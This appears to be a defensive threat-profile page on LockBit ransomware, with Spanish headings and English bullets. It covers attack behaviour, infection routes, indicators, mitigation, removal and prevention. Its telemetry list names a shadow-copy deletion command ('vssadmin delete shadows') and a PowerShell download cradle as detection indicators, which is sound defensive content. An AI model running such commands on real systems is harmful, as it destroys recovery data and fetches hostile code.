LockBit Ransomware

Resumen de la amenaza

LockBit operates as a ransomware-as-a-service platform. Affiliates deploy encryptors across networks, exfiltrate sensitive data, and publish leaks to pressure victims into paying ransoms.

Comportamiento del ataque

• Mass file encryption using hybrid AES + RSA schemes
• Shadow copy and backup service deletion
• Data exfiltration prior to encryption for double extortion
• Lateral movement via stolen credentials and RDP

Métodos de infección

• Phishing attachments
• Exploited VPN or RDP endpoints
• Malicious email links
• Supply-chain compromise

Síntomas e indicadores

• Renamed files with unusual extensions
• Ransom notes on desktops
• Disabled recovery tools
• Unexpected network traffic spikes

Mitigación inmediata

• Isolate affected endpoints immediately
• Preserve forensic images before cleanup
• Notify legal and incident response teams
• Do not pay ransom without professional guidance

Guía de eliminación

• Boot from clean media and scan offline
• Restore from verified offline backups
• Rebuild compromised domain controllers
• Rotate all domain credentials

Métodos de prevención

• Enable behavioral ransomware protection
• Maintain immutable offline backups
• Patch edge services and disable unused RDP
• Enforce least-privilege access

Indicadores de telemetría

• vssadmin delete shadows
• Mass .lockbit extension renames
• Suspicious PowerShell download cradle